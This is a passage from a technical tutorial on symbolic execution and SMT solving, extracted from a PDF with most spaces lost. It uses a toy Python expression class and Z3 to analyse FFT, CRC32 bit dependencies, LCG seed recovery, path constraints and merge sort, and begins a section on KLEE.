e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**1)*((input_1-(((-1-1.22464679915e-16j)**0)*
input_5))+(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7))))))
2 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915
e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**2)*((input_1+(((-1-1.22464679915e-16j)**0)*
input_5))-(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7))))))
3 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915
e-16j)**0)*input_6))))+(((0.707106781187-0.707106781187j)**3)*((input_1-(((-1-1.22464679915e-16j)**0)*
input_5))-(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7))))))
4 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915
e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**0)*((input_1+(((-1-1.22464679915e-16j)**0)*
input_5))+(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7))))))
5 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))+(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915
e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**1)*((input_1-(((-1-1.22464679915e-16j)**0)*
input_5))+(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7))))))
6 : (((input_0+(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**0)*(input_2+(((-1-1.22464679915
e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**2)*((input_1+(((-1-1.22464679915e-16j)**0)*
input_5))-(((6.12323399574e-17-1j)**0)*(input_3+(((-1-1.22464679915e-16j)**0)*input_7))))))
7 : (((input_0-(((-1-1.22464679915e-16j)**0)*input_4))-(((6.12323399574e-17-1j)**1)*(input_2-(((-1-1.22464679915
e-16j)**0)*input_6))))-(((0.707106781187-0.707106781187j)**3)*((input_1-(((-1-1.22464679915e-16j)**0)*
input_5))-(((6.12323399574e-17-1j)**1)*(input_3-(((-1-1.22464679915e-16j)**0)*input_7))))))
Wecanseesubexpressionsinformlike x0andx1. Wecaneliminatethem,since x0= 1andx1=x. Also,
wecanreducesubexpressionslike x1tojust x.
def __mul__(self, other):
op1=self.s
op2=self.convert_to_Expr_if_int(other).s
if op1=="1":
return Expr(op2)
if op2=="1":
return Expr(op1)
return Expr("(" + op1 + "*" + op2 + ")")
def __pow__(self, other):
op2=self.convert_to_Expr_if_int(other).s
if op2=="0":
return Expr("1")
if op2=="1":
return Expr(self.s)
return Expr("(" + self.s + "**" + op2 + ")")
0 : (((input_0+input_4)+(input_2+input_6))+((input_1+input_5)+(input_3+input_7)))
1 : (((input_0-input_4)+((6.12323399574e-17-1j)*(input_2-input_6)))+((0.707106781187-0.707106781187j)*((input_1-
input_5)+((6.12323399574e-17-1j)*(input_3-input_7)))))
2 : (((input_0+input_4)-(input_2+input_6))+(((0.707106781187-0.707106781187j)**2)*((input_1+input_5)-(input_3+
input_7))))
66
3 : (((input_0-input_4)-((6.12323399574e-17-1j)*(input_2-input_6)))+(((0.707106781187-0.707106781187j)**3)*((
input_1-input_5)-((6.12323399574e-17-1j)*(input_3-input_7)))))
4 : (((input_0+input_4)+(input_2+input_6))-((input_1+input_5)+(input_3+input_7)))
5 : (((input_0-input_4)+((6.12323399574e-17-1j)*(input_2-input_6)))-((0.707106781187-0.707106781187j)*((input_1-
input_5)+((6.12323399574e-17-1j)*(input_3-input_7)))))
6 : (((input_0+input_4)-(input_2+input_6))-(((0.707106781187-0.707106781187j)**2)*((input_1+input_5)-(input_3+
input_7))))
7 : (((input_0-input_4)-((6.12323399574e-17-1j)*(input_2-input_6)))-(((0.707106781187-0.707106781187j)**3)*((
input_1-input_5)-((6.12323399574e-17-1j)*(input_3-input_7)))))
8.2.4 Cyclic redundancy check
I’vealwaysbeenwondering,whichinputbitaffectswhichbitinthefinalCRC32value.
FromtheCRC69theory(goodandconciseintroduction: http://web.archive.org/web/20161220015646/
http://www.hackersdelight.org/crc.pdf )weknowthat CRCisshiftingregisterwithtaps.
Wewilltrackeachbitratherthanbyteorword,whichishighlyinefficient,butservesourpurposebetter:
#!/usr/bin/env python
import sys
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
def __xor__(self, other):
return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
BYTES=1
def crc32(buf):
#state=[Expr("init_%d" % i) for i in range(32)]
state=[Expr("1") for i in range(32)]
for byte in buf:
for n in range(8):
bit=byte[n]
to_taps=bit^state[31]
state[31]=state[30]
state[30]=state[29]
state[29]=state[28]
state[28]=state[27]
state[27]=state[26]
state[26]=state[25]^to_taps
state[25]=state[24]
state[24]=state[23]
state[23]=state[22]^to_taps
state[22]=state[21]^to_taps
state[21]=state[20]
state[20]=state[19]
state[19]=state[18]
state[18]=state[17]
state[17]=state[16]
state[16]=state[15]^to_taps
state[15]=state[14]
state[14]=state[13]
state[13]=state[12]
state[12]=state[11]^to_taps
state[11]=state[10]^to_taps
state[10]=state[9]^to_taps
state[9]=state[8]
state[8]=state[7]^to_taps
state[7]=state[6]^to_taps
69Cyclicredundancycheck
67
state[6]=state[5]
state[5]=state[4]^to_taps
state[4]=state[3]^to_taps
state[3]=state[2]
state[2]=state[1]^to_taps
state[1]=state[0]^to_taps
state[0]=to_taps
for i in range(32):
print "state %d=%s" % (i, state[31-i])
buf=[[Expr("in_%d_%d" % (byte, bit)) for bit in range(8)] for byte in range(BYTES)]
crc32(buf)
HereareexpressionsforeachCRC32bitfor1-bytebuffer:
state 0=(1^(in_0_2^1))
state 1=((1^(in_0_0^1))^(in_0_3^1))
state 2=(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))
state 3=(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))
state 4=(((1^(in_0_2^1))^(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))
state 5=(((1^(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))
state 6=((1^(in_0_4^1))^(in_0_5^1))
state 7=((1^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 8=(((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 9=((1^(in_0_1^1))^(in_0_7^(1^(in_0_1^1))))
state 10=(1^(in_0_2^1))
state 11=(1^(in_0_3^1))
state 12=((1^(in_0_0^1))^(in_0_4^1))
state 13=(((1^(in_0_0^1))^(in_0_1^1))^(in_0_5^1))
state 14=((((1^(in_0_0^1))^(in_0_1^1))^(in_0_2^1))^(in_0_6^(1^(in_0_0^1))))
state 15=((((1^(in_0_1^1))^(in_0_2^1))^(in_0_3^1))^(in_0_7^(1^(in_0_1^1))))
state 16=((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_4^1))
state 17=(((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_5^1))
state 18=(((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 19=((((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))
))
state 20=((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))
))
state 21=(((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 22=(((((1^(in_0_0^1))^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 23=((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))
))
state 24=((((((in_0_0^1)^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 25=(((((in_0_1^1)^(in_0_2^1))^(in_0_3^1))^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 26=(((((in_0_2^1)^(in_0_3^1))^(in_0_4^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 27=((((in_0_3^1)^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))
state 28=(((in_0_4^1)^(in_0_5^1))^(in_0_6^(1^(in_0_0^1))))
state 29=(((in_0_5^1)^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))
state 30=((in_0_6^(1^(in_0_0^1)))^(in_0_7^(1^(in_0_1^1))))
state 31=(in_0_7^(1^(in_0_1^1)))
Forlargerbuffer, expressionsgets increasingexponentially. This is 0th bit of the final state for 4-byte
buffer:
state 0=((((((((((((((in_0_0^1)^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_7^(1^(in_0_1^1))))^
(in_1_0^(1^(in_0_2^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_1_3^(((1^(in_0_1^1))^
(in_0_2^1))^(in_0_5^1))))^(in_1_4^(((1^(in_0_2^1))^(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))))^(in_2_0^((((1^
(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^
1))))))^(in_2_6^(((((((1^(in_0_0^1))^(in_0_1^1))^(in_0_2^1))^(in_0_6^(1^(in_0_0^1))))^(in_1_4^(((1^(in_0_2^1))^
(in_0_3^1))^(in_0_6^(1^(in_0_0^1))))))^(in_1_5^(((1^(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))))^
(in_2_0^((((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))
^
(in_0_4^1))))))))^(in_2_7^(((((((1^(in_0_1^1))^(in_0_2^1))^(in_0_3^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_5^(((1^
(in_0_3^1))^(in_0_4^1))^(in_0_7^(1^(in_0_1^1))))))^(in_1_6^(((1^(in_0_4^1))^(in_0_5^1))^(in_1_0^(1^(in_0_2^
1))))))^(in_2_1^((((1^(in_0_1^1))^(in_0_7^(1^(in_0_1^1))))^(in_1_0^(1^(in_0_2^1))))^(in_1_3^(((1^(in_0_1^1))^
(in_0_2^1))^(in_0_5^1))))))))^(in_3_2^(((((((((1^(in_0_1^1))^(in_0_2^1))^(in_0_4^1))^(in_0_5^1))^(in_0_6^(1^
(in_0_0^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_2_0^((((1^(in_0_0^1))^(in_0_6^(1^(in_0_0^
1))))^(in_0_7^(1^(in_0_1^1))))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))))^(in_2_1^((((1^(in_0_1^1))^
(in_0_7^(1^(in_0_1^1))))^(in_1_0^(1^(in_0_2^1))))^(in_1_3^(((1^(in_0_1^1))^(in_0_2^1))^(in_0_5^1))))))^(in_2_4^
(((((1^(in_0_0^1))^(in_0_4^1))^(in_1_2^(((1^(in_0_0^1))^(in_0_1^1))^(in_0_4^1))))^(in_1_3^(((1^(in_0_1^1))^
(in_0_2^1))^(in_0_5^1))))^(in_1_6^(((1^(in_0_4^1))^(in_0_5^1))^(in_1_0^(1^(in_0_2^1))))))))))
Expressionforthe0thbitofthefinalstatefor8-bytebufferhaslengthof 350KiB,whichis,ofcourse,
canbereducedsignificantly(becausethisexpressionisbasicallyXORtree),butyoucanfeeltheweightofit.
68
Nowwecanprocessthisexpressionssomehowtogetasmallerpictureonwhatisaffectingwhat. Let’s
say, if we can find “in_2_3” substring in expression, this means that 3rd bit of 2nd byte of input affects
this expression. But even more than that: since this is XOR tree (i.e., expression consisting only of XOR
operations),ifsomeinputvariableisoccurringtwice,it’s annihilated,since xx= 0. Morethanthat: ifa
vairableoccurredevennumberoftimes(2,4,8,etc),it’sannihilated,butleftifit’soccurredoddnumberof
times(1,3,5,etc).
for i in range(32):
#print "state %d=%s" % (i, state[31-i])
sys.stdout.write ("state %02d: " % i)
for byte in range(BYTES):
for bit in range(8):
s="in_%d_%d" % (byte, bit)
if str(state[31-i]).count(s) & 1:
sys.stdout.write ("*")
else:
sys.stdout.write (" ")
sys.stdout.write ("\n")
(https://github.com/dennis714/SAT_SMT_article/blob/master/symbolic/4_CRC/2.py )
Nowthishoweachbitof1-byteinputbufferaffectseachbitofthefinalCRC32state:
state 00: *
state 01: * *
state 02: ** *
state 03: ** *
state 04: * ** *
state 05: * ** *
state 06: **
state 07: * **
state 08: * **
state 09: *
state 10: *
state 11: *
state 12: * *
state 13: ** *
state 14: ** *
state 15: ** *
state 16: * ***
state 17: ** ***
state 18: *** ***
state 19: *** ***
state 20: ** **
state 21: * ** *
state 22: ** **
state 23: ** **
state 24: * * ** *
state 25: **** **
state 26: ***** **
state 27: * *** *
state 28: * ***
state 29: ** ***
state 30: ** **
state 31: * *
Thisis8*8=64bitsof8-byteinputbuffer:
state 00: * ** * *** * ** ** * * ***** *** * * ** *
state 01: * * ** * *** * ** ** * * ***** *** * * ** *
state 02: ** * ** * *** * ** ** * * ***** *** * * ** *
state 03: *** * ** * *** * ** ** * * ***** *** * * ** *
state 04: **** * ** * *** * ** ** * * ***** *** * * ** *
state 05: **** * ** * *** * ** ** * * ***** *** * * ** *
state 06: ** *** ** ** * ** *** * * ** ** *** * * * **
state 07: * ** *** ** ** * ** *** * * ** ** *** * * * **
state 08: * ** *** ** ** * ** *** * * ** ** *** * * * **
state 09: *** ** * * ** *** * ***** * * ** ** ** * * ** * *
state 10: ** * *** * * * * ** * * ** * * ** * ** *
state 11: ** * *** * * * * ** * * ** * * ** * ** *
state 12: ** * *** * * * * ** * * ** * * ** * ** *
state 13: ** * *** * * * * ** * * ** * * ** * ** *
state 14: ** * *** * * * * ** * * ** * * ** * ** *
state 15: ** * *** * * * * ** * * ** * * ** * ** *
state 16: * ** ****** ** ** ** * * * ** * ** * *** ***
state 17: * * ** ****** ** ** ** * * * ** * ** * *** ***
69
state 18: * * ** ****** ** ** ** * * * ** * ** * *** ***
state 19: * * * ** ****** ** ** ** * * * ** * ** * *** ***
state 20: ****** ** ** *** ** * * * ***** * **** * * ** **
state 21: ** *** ** * * * ** ** *** ** * * * ** * * ** *
state 22: ** * * *** ** ** * ** ***** * ** * *** * ** **
state 23: * ** * * *** ** ** * ** ***** * ** * *** * ** **
state 24: * *** * *** *** *** * * * * ** ***** ** * ** * ** *
state 25: * * *** *** * * **** * ** * *** * * ***** **
state 26: * * * *** *** * * **** * ** * *** * * ***** **
state 27: * *** * ***** **** * *** ** *** * ** * * *** *
state 28: *** * *** * ***** *** * * *** ** **** ***
state 29: *** * *** * ***** *** * * *** ** **** ***
state 30: ** *** * * *** ** * ** *** ** * ** *** * ** **
state 31: * ** * *** * ** ** * * ***** *** * * ** * *
8.2.5 Linear congruential generator
Thisispopular PRNG70fromOpenWatcom CRT71library: https://github.com/open-watcom/open-watcom-v2/
blob/d468b609ba6ca61eeddad80dd2485e3256fc5261/bld/clib/math/c/rand.c .
Whatexpressionitgeneratesoneachstep?
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
def __xor__(self, other):
return Expr("(" + self.s + "^" + self.convert_to_Expr_if_int(other).s + ")")
def __mul__(self, other):
return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
def __add__(self, other):
return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
def __and__(self, other):
return Expr("(" + self.s + "&" + self.convert_to_Expr_if_int(other).s + ")")
def __rshift__(self, other):
return Expr("(" + self.s + ">>" + self.convert_to_Expr_if_int(other).s + ")")
seed=Expr("initial_seed")
def rand():
global seed
seed=seed*1103515245+12345
return (seed>>16) & 0x7fff
for i in range(10):
print i, ":", rand()
0 : ((((initial_seed*1103515245)+12345)>>16)&32767)
1 : ((((((initial_seed*1103515245)+12345)*1103515245)+12345)>>16)&32767)
2 : ((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
3 : ((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)
&32767)
4 : ((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)>>16)&32767)
5 : ((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)*1103515245)+12345)>>16)&32767)
70Pseudorandomnumbergenerator
71Cruntimelibrary
70
6 : ((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
7 : ((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
8 : ((((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
9 : ((((((((((((((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)
+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)
*1103515245)+12345)>>16)&32767)
NowifweoncegotseveralvaluesfromthisPRNG,like4583,16304,14440,32315,28670,12568...,how
wouldwerecovertheinitialseed? Theprobleminfactissolvingasystemofequations:
((((initial_seed*1103515245)+12345)>>16)&32767)==4583
((((((initial_seed*1103515245)+12345)*1103515245)+12345)>>16)&32767)==16304
((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)==14440
((((((((((initial_seed*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)*1103515245)+12345)>>16)&32767)
==32315
Asitturnsout,Z3cansolvethissystemcorrectlyusingonlytwoequations:
#!/usr/bin/env python
from z3 import *
s=Solver()
x=BitVec("x",32)
a=1103515245
c=12345
s.add((((x*a)+c)>>16)&32767==4583)
s.add((((((x*a)+c)*a)+c)>>16)&32767==16304)
#s.add((((((((x*a)+c)*a)+c)*a)+c)>>16)&32767==14440)
#s.add((((((((((x*a)+c)*a)+c)*a)+c)*a)+c)>>16)&32767==32315)
s.check()
print s.model()
[x = 11223344]
(Though,ittakes 20secondsonmyancientIntelAtomnetbook.)
8.2.6 Path constraint
HowtogetweekdayfromUNIXtimestamp?
#!/usr/bin/env python
input=...
SECS_DAY=24*60*60
dayno = input / SECS_DAY
wday = (dayno + 4) % 7
if wday==5:
print "Thanks God, it's Friday!"
Let’ssay,weshouldfindawaytoruntheblockwithprint()callinit. Whatinputvalueshouldbe?
First,let’sbuildexpressionof wdayvariable:
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
71
def __div__(self, other):
return Expr("(" + self.s + "/" + self.convert_to_Expr_if_int(other).s + ")")
def __mod__(self, other):
return Expr("(" + self.s + "%" + self.convert_to_Expr_if_int(other).s + ")")
def __add__(self, other):
return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
input=Expr("input")
SECS_DAY=24*60*60
dayno = input / SECS_DAY
wday = (dayno + 4) % 7
print wday
if wday==5:
print "Thanks God, it's Friday!"
(((input/86400)+4)%7)
Inordertoexecutetheblock,weshouldsolvethisequation: ((input
86400+ 4)5mod 7.
Sofar,thisiseasytaskforZ3:
#!/usr/bin/env python
from z3 import *
s=Solver()
x=Int("x")
s.add(((x/86400)+4)%7==5)
s.check()
print s.model()
[x = 86438]
ThisisindeedcorrectUNIXtimestampforFriday:
% date --date='@86438'
Fri Jan 2 03:00:38 MSK 1970
Thoughthedatebackinyear1970,butit’sstillcorrect!
This is also called “path constraint”, i.e., what constraint must be satisified to execute specific block?
Severaltoolshas“path”intheirnames,like“pathgrind”, SymbolicPathFinder ,CodeSurferPathInspector,
etc.
Liketheshellgame,thistaskisalsooftenencountersinpractice. Youcanseethatsomethingdangerous
canbeexecutedinsidesomebasicblockandyou’retryingtodeduce,whatinputvaluescancauseexecution
ofit. Itmaybebufferoverflow,etc. Suchinputvaluesaresometimesalsocalled“inputsofdeath”.
Manycrackmesaresolvedinthisway,allyouneedisfindapathintoblockwhichprints“keyiscorrect”
orsomethinglikethat.
Wecanextendthistinyexample:
input=...
SECS_DAY=24*60*60
dayno = input / SECS_DAY
wday = (dayno + 4) % 7
print wday
if wday==5:
print "Thanks God, it's Friday!"
else:
print "Got to wait a little"
Nowwehavetwoblocks: forthefirstweshouldsolvethisequation: ((input
86400+ 4)5mod 7. Butforthe
secondweshouldsolveinvertedequation: ((input
86400+ 4)̸5mod 7. Bysolvingtheseequations,wewillfind
twopathsintobothblocks.
KLEE(orsimilartool)triestofindpathtoeach[basic]blockandproduces“ideal”unittest.Hence,KLEEcan
findapathintotheblockwhichcrasheseverything,orreportingaboutcorrectnessoftheinputkey/license,
etc. Surprisingly,KLEEcanfindbackdoorsintheverysamemanner.
72
KLEEisalsocalled“KLEESymbolicVirtualMachine”–bythatitscreatorsmeanthattheKLEEis VM72which
executesacodesymbolicallyratherthannumerically(likeusual CPU).
8.2.7 Division by zero
Ifdivisionbyzeroisunwrappedbysanitizingcheck,andexceptionisn’tcaught,itcancrashprocess.
Let’scalculatesimpleexpressionx
2y+4z 12. Wecanaddawarninginto __div__method:
#!/usr/bin/env python
class Expr:
def __init__(self,s):
self.s=s
def convert_to_Expr_if_int(self, n):
if isinstance(n, int):
return Expr(str(n))
if isinstance(n, Expr):
return n
raise AssertionError # unsupported type
def __str__(self):
return self.s
def __mul__(self, other):
return Expr("(" + self.s + "*" + self.convert_to_Expr_if_int(other).s + ")")
def __div__(self, other):
op2=self.convert_to_Expr_if_int(other).s
print "warning: division by zero if "+op2+"==0"
return Expr("(" + self.s + "/" + op2 + ")")
def __add__(self, other):
return Expr("(" + self.s + "+" + self.convert_to_Expr_if_int(other).s + ")")
def __sub__(self, other):
return Expr("(" + self.s + "-" + self.convert_to_Expr_if_int(other).s + ")")
"""
x
------------
2y + 4z - 12
"""
def f(x, y, z):
return x/(y*2 + z*4 - 12)
print f(Expr("x"), Expr("y"), Expr("z"))
...soitwillreportaboutdangerousstatesandconditions:
warning: division by zero if (((y*2)+(z*4))-12)==0
(x/(((y*2)+(z*4))-12))
Thisequationiseasytosolve,let’stryWolframMathematicathistime:
In[]:= FindInstance[{(y*2 + z*4) - 12 == 0}, {y, z}, Integers]
Out[]= {{y -> 0, z -> 3}}
Thesevaluesfor yandzcanalsobecalled“inputsofdeath”.
8.2.8 Merge sort
Howmergesortworks? IhavecopypastedPythoncodefromrosettacode.comalmostintact:
#!/usr/bin/env python
class Expr:
def __init__(self,s,i):
self.s=s
self.i=i
72VirtualMachine
73
def __str__(self):
# return both symbolic and integer:
return self.s+" (" + str(self.i)+")"
def __le__(self, other):
# compare only integer parts:
return self.i <= other.i
# copypasted from http://rosettacode.org/wiki/Sorting_algorithms/Merge_sort#Python
def merge(left, right):
result = []
left_idx, right_idx = 0, 0
while left_idx < len(left) and right_idx < len(right):
# change the direction of this comparison to change the direction of the sort
if left[left_idx] <= right[right_idx]:
result.append(left[left_idx])
left_idx += 1
else:
result.append(right[right_idx])
right_idx += 1
if left_idx < len(left):
result.extend(left[left_idx:])
if right_idx < len(right):
result.extend(right[right_idx:])
return result
def tabs (t):
return "\t"*t
def merge_sort(m, indent=0):
print tabs(indent)+"merge_sort() begin. input:"
for i in m:
print tabs(indent)+str(i)
if len(m) <= 1:
print tabs(indent)+"merge_sort() end. returning single element"
return m
middle = len(m) // 2
left = m[:middle]
right = m[middle:]
left = merge_sort(left, indent+1)
right = merge_sort(right, indent+1)
rt=list(merge(left, right))
print tabs(indent)+"merge_sort() end. returning:"
for i in rt:
print tabs(indent)+str(i)
return rt
# input buffer has both symbolic and numerical values:
input=[Expr("input1",22), Expr("input2",7), Expr("input3",2), Expr("input4",1), Expr("input5",8), Expr("input6
",4)]
merge_sort(input)
Buthereisafunctionwhichcompareselements. Obviously,itwouldn’tworkcorrectlywithoutit.
Sowecantrackbothexpressionforeachelementandnumericalvalue. Bothwillbeprintedfinally. But
whenevervaluesaretobecompared,onlynumericalpartswillbeused.
Result:
merge_sort() begin. input:
input1 (22)
input2 (7)
input3 (2)
input4 (1)
input5 (8)
input6 (4)
merge_sort() begin. input:
input1 (22)
input2 (7)
input3 (2)
merge_sort() begin. input:
input1 (22)
merge_sort() end. returning single element
74
merge_sort() begin. input:
input2 (7)
input3 (2)
merge_sort() begin. input:
input2 (7)
merge_sort() end. returning single element
merge_sort() begin. input:
input3 (2)
merge_sort() end. returning single element
merge_sort() end. returning:
input3 (2)
input2 (7)
merge_sort() end. returning:
input3 (2)
input2 (7)
input1 (22)
merge_sort() begin. input:
input4 (1)
input5 (8)
input6 (4)
merge_sort() begin. input:
input4 (1)
merge_sort() end. returning single element
merge_sort() begin. input:
input5 (8)
input6 (4)
merge_sort() begin. input:
input5 (8)
merge_sort() end. returning single element
merge_sort() begin. input:
input6 (4)
merge_sort() end. returning single element
merge_sort() end. returning:
input6 (4)
input5 (8)
merge_sort() end. returning:
input4 (1)
input6 (4)
input5 (8)
merge_sort() end. returning:
input4 (1)
input3 (2)
input6 (4)
input2 (7)
input5 (8)
input1 (22)
8.2.9 Extending Expr class
This is somewhat senseless, nevertheless, it’s easy task to extend my Expr class to support ASTinstead
ofplainstrings. It’salsopossibletoaddfoldingsteps(likeIdemonstratedinToyDecompiler: 7). Maybe
someonewillwanttodothisasanexercise.Bytheway,thetoydecompilercanbeusedassimplesymbolic
engineaswell,justfeedalltheinstructionstoitanditwilltrackcontentsofeachregister.
8.2.10 Conclusion
Forthesakeofdemonstration,Imadethingsassimpleaspossible. Butrealityisalwaysharshandinconve-
nient,soallthisshouldn’tbetakenasasilverbullet.
Thefilesusedinthispart: https://github.com/dennis714/SAT_SMT_article/tree/master/symbolic .
8.3 Further reading
JamesC.King—SymbolicExecutionandProgramTesting73
73https://yurichev.com/mirrors/king76symbolicexecution.pdf
75
9 KLEE
9.1 Installation
KLEEbuildingfromsourceistricky.EasiestwaytouseKLEEistoinstalldocker74andthentorunKLEEdocker
image75.
9.2 School-level equation
Let’srevisitschool-levelsystemofequationsfrom( 5.2).
WewillforceKLEEtofindapath,wherealltheconstraintsaresatisfied:
int main()
{
int circle, square, triangle;
klee_make_symbolic(&circle, sizeof circle, "circle");
klee_make_symbolic(&square, sizeof square, "square");
klee_make_symbolic(&triangle, sizeof triangle, "triangle");
if (circle+circle!=10) return 0;
if (circle*square+square!=12) return 0;
if (circle*square-triangle*circle!=circle) return 0;
// all constraints should be satisfied at this point
// force KLEE to produce .err file:
klee_assert(0);
};
% clang -emit-llvm -c -g klee_eq.c
...
% klee klee_eq.bc
KLEE: output directory is "/home/klee/klee-out-93"
KLEE: WARNING: undefined reference to function: klee_assert
KLEE: WARNING ONCE: calling external: klee_assert(0)
KLEE: ERROR: /home/klee/klee_eq.c:18: failed external call: klee_assert
KLEE: NOTE: now ignoring this error at this location
KLEE: done: total instructions = 32
KLEE: done: completed paths = 1
KLEE: done: generated tests = 1
Let’sfindout,where klee_assert() hasbeentriggered:
% ls klee-last | grep err
test000001.external.err
% ktest-tool --write-ints klee-last/test000001.ktest
ktest file : 'klee-last/test000001.ktest'
args : ['klee_eq.bc']
num objects: 3
object 0: name: b'circle'
object 0: size: 4
object 0: data: 5
object 1: name: b'square'
object 1: size: 4
object 1: data: 2
object 2: name: b'triangle'
object 2: size: 4
object 2: data: 1
Thisisindeedcorrectsolutiontothesystemofequations.
KLEEhasintrinsic klee_assume() whichtellsKLEEtocutpathifsomeconstraintisnotsatisfied. Sowe
canrewriteourexampleinsuchcleanerway:
int main()
{
74https://docs.docker.com/engine/installation/linux/ubuntulinux/
75http://klee.github.io/docker/
76
int circle, square, triangle;
klee_make_symbolic(&circle, sizeof circle, "circle");
klee_make_symbolic(&square, sizeof square, "square");
klee_make_symbolic(&triangle, sizeof triangle, "triangle");
klee_assume (circle+circle==10);
klee_assume (circle*square+square==12);
klee_assume (circle*square-triangle*circle==circle);
// all constraints should be satisfied at this point
// force KLEE to produce .err file:
klee_assert(0);
};
9.3 Zebra puzzle
Let’srevisitzebrapuzzlefrom( 5.4).
